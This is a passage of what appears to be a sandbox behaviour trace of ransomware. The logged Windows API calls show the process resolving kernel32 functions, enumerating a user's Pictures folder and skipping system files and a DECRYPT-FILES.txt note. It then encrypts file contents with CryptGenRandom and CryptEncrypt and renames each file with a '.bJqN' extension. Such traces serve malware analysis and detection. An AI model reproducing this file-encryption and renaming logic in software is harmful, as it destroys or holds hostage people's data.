(lpString="ENABLETHREADPROFILING") returned 21 [0086.995] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0086.995] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0086.995] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0086.995] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0086.995] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0086.995] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0086.995] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0086.995] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0086.995] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0086.995] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0086.996] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0086.996] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0086.996] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0086.996] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0086.996] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0086.996] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0086.996] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0086.996] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0086.996] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0086.996] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0086.996] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0086.996] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0086.996] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0086.996] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0086.996] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0086.996] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0086.996] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0086.996] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0086.996] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0086.996] lstrcpyW (in: lpString1=0xfb0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0086.996] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZeLlJvzMNja\\UT-SH4cQR9b.gif") returned 66 [0086.996] wsprintfW (in: param_1=0x3f2dea4, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZeLlJvzMNja\\UT-SH4cQR9b.gif.bJqN") returned 71 [0086.996] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZeLlJvzMNja\\UT-SH4cQR9b.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\zelljvzmnja\\ut-sh4cqr9b.gif"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZeLlJvzMNja\\UT-SH4cQR9b.gif.bJqN" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\zelljvzmnja\\ut-sh4cqr9b.gif.bjqn"), dwFlags=0x0) returned 1 [0086.997] VirtualFree (lpAddress=0xfa0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.997] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.997] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.998] FindNextFileW (in: hFindFile=0x5f8c98, lpFindFileData=0x3f2eed4 | out: lpFindFileData=0x3f2eed4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x83592950, ftCreationTime.dwHighDateTime=0x1d4cbfd, ftLastAccessTime.dwLowDateTime=0x8289450, ftLastAccessTime.dwHighDateTime=0x1d4d3dc, ftLastWriteTime.dwLowDateTime=0x8289450, ftLastWriteTime.dwHighDateTime=0x1d4d3dc, nFileSizeHigh=0x0, nFileSizeLow=0xee08, dwReserved0=0x0, dwReserved1=0x0, cFileName="UT-SH4cQR9b.gif", cAlternateFileName="UT-SH4~1.GIF")) returned 0 [0086.998] FindClose (in: hFindFile=0x5f8c98 | out: hFindFile=0x5f8c98) returned 1 [0086.998] CloseHandle (hObject=0x410) returned 1 [0086.998] FindNextFileW (in: hFindFile=0x5f8b98, lpFindFileData=0x3f2f150 | out: lpFindFileData=0x3f2f150*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcc5ab4d0, ftCreationTime.dwHighDateTime=0x1d4c6d4, ftLastAccessTime.dwLowDateTime=0x35cd44d0, ftLastAccessTime.dwHighDateTime=0x1d4d3c5, ftLastWriteTime.dwLowDateTime=0x35cd44d0, ftLastWriteTime.dwHighDateTime=0x1d4d3c5, nFileSizeHigh=0x0, nFileSizeLow=0xefe, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Zr3fqdEKfc.jpg", cAlternateFileName="ZR3FQD~1.JPG")) returned 1 [0086.998] lstrcmpiW (lpString1="Zr3fqdEKfc.jpg", lpString2="DECRYPT-FILES.txt") returned 1 [0086.999] lstrcmpiW (lpString1="Zr3fqdEKfc.jpg", lpString2="autorun.inf") returned 1 [0086.999] lstrcmpiW (lpString1="Zr3fqdEKfc.jpg", lpString2="boot.ini") returned 1 [0086.999] lstrcmpiW (lpString1="Zr3fqdEKfc.jpg", lpString2="desktop.ini") returned 1 [0086.999] lstrcmpiW (lpString1="Zr3fqdEKfc.jpg", lpString2="ntuser.dat") returned 1 [0086.999] lstrcmpiW (lpString1="Zr3fqdEKfc.jpg", lpString2="iconcache.db") returned 1 [0086.999] lstrcmpiW (lpString1="Zr3fqdEKfc.jpg", lpString2="bootsect.bak") returned 1 [0086.999] lstrcmpiW (lpString1="Zr3fqdEKfc.jpg", lpString2="ntuser.dat.log") returned 1 [0086.999] lstrcmpiW (lpString1="Zr3fqdEKfc.jpg", lpString2="thumbs.db") returned 1 [0086.999] lstrcmpiW (lpString1="Zr3fqdEKfc.jpg", lpString2="Bootfont.bin") returned 1 [0086.999] lstrlenW (lpString="Zr3fqdEKfc.jpg") returned 14 [0086.999] lstrcmpiW (lpString1="jpg", lpString2="lnk") returned -1 [0086.999] lstrcmpiW (lpString1="jpg", lpString2="exe") returned 1 [0086.999] lstrcmpiW (lpString1="jpg", lpString2="sys") returned -1 [0086.999] lstrcmpiW (lpString1="jpg", lpString2="dll") returned 1 [0086.999] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned 39 [0086.999] lstrlenW (lpString="Zr3fqdEKfc.jpg") returned 14 [0086.999] lstrcpyW (in: lpString1=0x3f2e920, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" [0086.999] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\", lpString2="Zr3fqdEKfc.jpg" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\Zr3fqdEKfc.jpg") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\Zr3fqdEKfc.jpg" [0086.999] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0086.999] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\Zr3fqdEKfc.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\zr3fqdekfc.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x410 [0086.999] GetFileSizeEx (in: hFile=0x410, lpFileSize=0x3f2e0e8 | out: lpFileSize=0x3f2e0e8*=3838) returned 1 [0087.000] CreateFileMappingW (hFile=0x410, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x414 [0087.000] MapViewOfFile (hFileMappingObject=0x414, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfa0000 [0087.000] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xf90000 | out: pbBuffer=0xf90000) returned 1 [0087.000] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xf90020 | out: pbBuffer=0xf90020) returned 1 [0087.000] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0087.000] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfb0000*, pdwDataLen=0x3f2e050*=0x28, dwBufLen=0x100 | out: pbData=0xfb0000*, pdwDataLen=0x3f2e050*=0x100) returned 1 [0087.000] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0087.001] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.001] UnmapViewOfFile (lpBaseAddress=0xfa0000) returned 1 [0087.001] CloseHandle (hObject=0x414) returned 1 [0087.001] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0087.001] WriteFile (in: hFile=0x410, lpBuffer=0xfb0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2e070, lpOverlapped=0x0 | out: lpBuffer=0xfb0000*, lpNumberOfBytesWritten=0x3f2e070*=0x108, lpOverlapped=0x0) returned 1 [0087.002] CloseHandle (hObject=0x0) returned 0 [0087.002] CloseHandle (hObject=0x410) returned 1 [0087.002] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.002] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.003] GetTickCount () returned 0x114e32e [0087.003] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0087.003] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0087.003] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0xfa0000 [0087.003] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0087.003] lstrlenA (lpString="kernel32.dll") returned 12 [0087.004] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0087.004] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0087.004] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0087.004] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0087.004] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0087.004] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0087.004] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0087.004] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0087.004] lstrlenA (lpString="ADDATOMA") returned 8 [0087.004] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0087.004] lstrlenA (lpString="ADDATOMW") returned 8 [0087.004] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0087.004] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0087.004] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0087.004] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0087.004] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0087.004] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0087.004] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0087.004] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0087.004] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0087.004] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0087.004] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0087.004] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0087.004] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0087.004] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0087.004] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0087.004] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0087.004] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0087.004] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0087.004] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0087.004] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0087.004] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0087.004] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0087.004] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0087.005] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0087.005] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0087.005] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0087.005] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0087.005] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0087.005] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0087.005] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0087.005] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0087.005] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0087.005] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0087.005] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0087.005] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0087.005] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0087.005] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0087.005] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0087.005] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0087.005] lstrlenA (lpString="BACKUPREAD") returned 10 [0087.005] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0087.005] lstrlenA (lpString="BACKUPSEEK") returned 10 [0087.005] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0087.005] lstrlenA (lpString="BACKUPWRITE") returned 11 [0087.005] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0087.005] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0087.005] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0087.005] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0087.005] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0087.005] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0087.005] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0087.005] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0087.005] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0087.005] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0087.005] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0087.005] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0087.005] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0087.005] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0087.005] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0087.005] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0087.006] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0087.006] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0087.006] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0087.006] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0087.006] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0087.006] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0087.006] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0087.006] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0087.006] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0087.006] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0087.006] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0087.006] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0087.006] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0087.006] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0087.006] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0087.006] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0087.006] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0087.006] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0087.006] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0087.006] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0087.006] lstrcpyA (in: lpString1=0x3f2d468, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0087.006] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0087.006] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0087.006] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0087.006] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0087.006] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0087.006] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0087.006] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0087.006] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0087.006] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0087.006] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0087.006] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0087.006] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0087.006] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0087.006] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0087.006] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0087.007] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0087.007] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0087.007] lstrcpyA (in: lpString1=0x3f2d468, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0087.007] lstrlenA (lpString="BEEP") returned 4 [0087.007] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0087.007] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0087.007] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0087.007] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0087.007] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0087.007] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0087.007] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0087.007] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0087.007] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0087.007] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0087.007] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0087.007] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0087.007] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0087.007] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0087.007] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0087.007] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0087.007] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0087.007] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0087.007] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0087.007] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0087.007] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0087.007] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0087.007] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0087.007] lstrlenA (lpString="CANCELIO") returned 8 [0087.007] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0087.007] lstrlenA (lpString="CANCELIOEX") returned 10 [0087.007] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0087.007] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0087.007] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") 